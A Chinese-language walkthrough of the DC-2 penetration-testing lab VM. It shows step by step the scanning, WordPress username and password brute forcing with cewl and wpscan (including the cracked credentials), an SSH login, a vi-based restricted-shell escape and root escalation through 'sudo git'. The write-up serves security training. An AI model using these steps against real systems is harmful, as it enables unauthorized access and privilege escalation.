DC-2渗透实战(详细过程)
目录
DC-2靶机
1.主机发现
2.端口扫描
3.网页信息探测
4.敏感目录扫描
5.Web渗透
生成爆破字典
用户名爆破
密码爆破
后台登录
6.主机渗透
ssh登录
rbash提权
vi设置shell提权
切换用户提权
git提权
DC-2靶机
DC-2靶场下载地址http://www.five86.com/downloads/DC-2.zip
下载完成后用vmware打开
确保DC-2 和kali处在同一网段下
1.主机发现
arp-scan -l
对比靶机MAC地址确定靶机IP为192.168.20.139
2.端口扫描
nmap -sV -p- 192.168.20.139
发现开放80和7744端口 提供http服务和ssh服务
3.网页信息探测
直接在firefox输入192.168.20.138:80 会打不开页面
查阅了一下资料是因为没有重定向
解决办法: 修改本地DNS文件
打开/etc/hosts文件 添加本地dns
访问192.168.20.139
看到有个flag 点击查看一下
虽然没有flag值 但是提示使用cewl工具生成字典
对站点信息探测
whatweb -v 192.168.20.139
未发现可疑点
4.敏感目录扫描
nikto -host 192.168.20.139
发现一个名为 wp-login.php 的敏感目录文件
直接在浏览器中打开
需要账号密码登录 只需要得到账号密码就行了
5.Web渗透
生成爆破字典
根据提示 用cewl爬取字典 =可以选择放在桌面
cewl http://dc-2/wp-login.php -w ~/Desktop/cewl.txt
用户名爆破
wpscan是kali自带的用户名爆破工具
wpscan --url dc-2 -e u
爆破出三个用户名
分别是 admin jerry tom
密码爆破
在桌面创建一个user文件 存放admin jerry tom 三个用户名
继续使用wpscan进行爆破
wpscan --url dc-2 -U ~/Desktop/user.txt -P ~/Desktop/cewl.txt
成功爆破出密码
现在得到如下信息
账号 jerry 密码 adipiscing
账号 tom 密码 parturient
后台登录
用爆破到的账号密码进行登录
在jerry账号中看到了flag2
提示我们换一种方法
6.主机渗透
ssh登录
在端口扫描的时候扫描出了7744端口的ssh服务
并且通过Web渗透得到了两个用户名和密码
现在来尝试一下ssh登录 看看能不能发现什么
ssh [email protected] -p 7744
jerry用户登录失败
ssh [email protected] -p 7744
成功登录tom用户
ls查看 发现了flag3.txt 奈何权限太小 无法打开
直接从bash变成了rbash 那看来是要进行提权了
rbash提权
因为没有cd权限 就用echo输出查看
先查看一下rbash的PATH路径下的文件
echo $PATH
echo /home/tom/usr/bin/*
现在能用的命令就是 less ls scp vi 了
vi设置shell提权
进入vi编辑界面
末行模式输入 :set shell=/bin/bash
回车 继续输入 :shell
回车 自动退出vi 说明提权成功 whoami查看权限
虽然不是root权限 但已经从rbash变为了bash
已经升级为bash了,无法执行cat命令是因为环境变量的问题,用命令添加一下两条路径即可
export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin
接下来再查看flag3.txt
提示我们切换成jerry用户
切换用户提权
切换为jerry用户 用之前获取的密码进行登录
查找一下有无flag文件
find / -name flag*
查看flag4文件
提示要git提权
git提权
抱着怀疑的态度 想试试SUID提权
先查询一下具有SUID的二进制文件
find / -user root -perm -4000 -print 2>/dev/null
没有能利用的
还是继续用git提权
sudo -l
发现git能执行root权限
接下来进行提权
sudo git help config
回车然后输入 !/bin/bash
回车 输入whoami 发现已经变成了root权限
进入/root目录 并查看最终flag
成功通关!!!